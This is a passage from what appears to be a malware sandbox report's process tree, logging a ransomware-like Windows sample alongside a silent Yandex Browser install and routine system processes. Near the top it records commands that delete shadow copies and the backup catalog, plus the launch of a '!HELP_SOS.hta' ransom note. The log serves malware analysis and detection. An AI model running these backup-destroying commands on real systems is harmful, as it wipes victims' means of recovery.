                                                                                                                    6⤵
                                                                                                                      PID:5116
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        wmic shadowcopy delete
                                                                                                                        7⤵
                                                                                                                          PID:14960
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                        6⤵
                                                                                                                          PID:6668
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                          6⤵
                                                                                                                            PID:11564
                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                            6⤵
                                                                                                                              PID:10456
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "r75nBTiJ"
                                                                                                                              6⤵
                                                                                                                                PID:4500
                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4014001487.vbs"
                                                                                                                                6⤵
                                                                                                                                  PID:13548
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                  6⤵
                                                                                                                                    PID:10660
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                    6⤵
                                                                                                                                      PID:9648
                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                        wmic shadowcopy delete
                                                                                                                                        7⤵
                                                                                                                                          PID:2356
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                        6⤵
                                                                                                                                          PID:11576
                                                                                                                                • C:\Windows\System32\vssadmin.exe
                                                                                                                                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                  2⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:1148
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe" --job-name=yBrowserDownloader-{E5CA29A9-7B31-4AB9-98FB-3C89AA088147} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={95c04196-f2e9-4e0d-b4e3-fec1994b052d} --use-user-default-locale
                                                                                                                                  2⤵
                                                                                                                                    PID:5740
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ybD40.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ybD40.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\1a0dd54d-791e-420f-8612-38a55587036e.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=637732110 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{E5CA29A9-7B31-4AB9-98FB-3C89AA088147} --local-path="C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={95c04196-f2e9-4e0d-b4e3-fec1994b052d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\3c5e78b1-8dc4-42af-ac83-eed975cfd166.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
                                                                                                                                      3⤵
                                                                                                                                        PID:15040
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\1a0dd54d-791e-420f-8612-38a55587036e.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=637732110 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{E5CA29A9-7B31-4AB9-98FB-3C89AA088147} --local-path="C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={95c04196-f2e9-4e0d-b4e3-fec1994b052d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\3c5e78b1-8dc4-42af-ac83-eed975cfd166.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
                                                                                                                                          4⤵
                                                                                                                                            PID:9360
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\1a0dd54d-791e-420f-8612-38a55587036e.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=637732110 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{E5CA29A9-7B31-4AB9-98FB-3C89AA088147} --local-path="C:\Users\Admin\AppData\Local\Temp\{2F21477F-A116-4C5A-984E-E0C55B8F5715}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={95c04196-f2e9-4e0d-b4e3-fec1994b052d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\3c5e78b1-8dc4-42af-ac83-eed975cfd166.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=661700867
                                                                                                                                              5⤵
                                                                                                                                              • System Time Discovery
                                                                                                                                              PID:13492
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\YB_FC8C5.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=13492 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0xc0,0x324,0x348,0xb8,0x34c,0x3ecbe8,0x3ecbf4,0x3ecc00
                                                                                                                                                6⤵
                                                                                                                                                  PID:14552
                                                                                                                                                • C:\Windows\TEMP\sdwra_13492_1244798643\service_update.exe
                                                                                                                                                  "C:\Windows\TEMP\sdwra_13492_1244798643\service_update.exe" --setup
                                                                                                                                                  6⤵
                                                                                                                                                    PID:11288
                                                                                                                                                    • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                      "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --install
                                                                                                                                                      7⤵
                                                                                                                                                        PID:13712
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2480
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source13492_1880974410\Browser-bin\clids_yandex_second.xml"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:14832
                                                                                                                                                • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=637732110
                                                                                                                                                  2⤵
                                                                                                                                                    PID:9720
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=9720 --annotation=metrics_client_id=d8dcdfa44e3644799929937efaecbd5a --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x180,0x184,0x188,0x15c,0x18c,0x6b2c9a24,0x6b2c9a30,0x6b2c9a3c
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2108
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --gpu-process-kind=sandboxed --field-trial-handle=2404,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2400 /prefetch:2
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5864
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2220,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2508 /prefetch:6
                                                                                                                                                          3⤵
                                                                                                                                                            PID:14556
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Network Service" --field-trial-handle=2552,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2824 --brver=24.10.2.705 /prefetch:3
                                                                                                                                                            3⤵
                                                                                                                                                              PID:11832
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Storage Service" --field-trial-handle=2672,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3576 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                              3⤵
                                                                                                                                                                PID:8524
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Audio Service" --field-trial-handle=3424,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4000 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:13660
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4436,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4456 /prefetch:1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:11088
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Video Capture" --field-trial-handle=4624,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4616 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5828
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4792 /prefetch:2
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7676
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=4832,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5020 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:7340
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=4844,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5528 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:15160
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4952,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5716 /prefetch:1
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:10364
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=uwp_cookie_provider.mojom.UwpCookieProvider --lang=ru --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name=uwp_cookie_provider.mojom.UwpCookieProvider --field-trial-handle=5948,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5984 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:7228
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6240,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:14196
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=6288,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6392 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2172
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=6344,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6412 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:7216
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=95c04196-f2e9-4e0d-b4e3-fec1994b052d --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=6272,i,12793746695557371404,18119226634826542865,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6536 --brver=24.10.2.705 /prefetch:8
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1984
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3624
                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3856
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3956
                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4020
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3568
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4176
                                                                                                                                                                                              • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2400
                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                                                                                                                  PID:812
                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1620
                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:1796
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1356 -ip 1356
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1384
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1356 -ip 1356
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4572
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1356 -ip 1356
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:8580
                                                                                                                                                                                                        • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                          werfault.exe /h /shared Global\32f80fd1f3c54a36a57ed886244faa1a /t 2844 /p 780
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5872
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1356 -ip 1356
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:11060
                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              PID:13716
                                                                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              PID:9088
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1356 -ip 1356
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:7620
                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                PID:9280
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
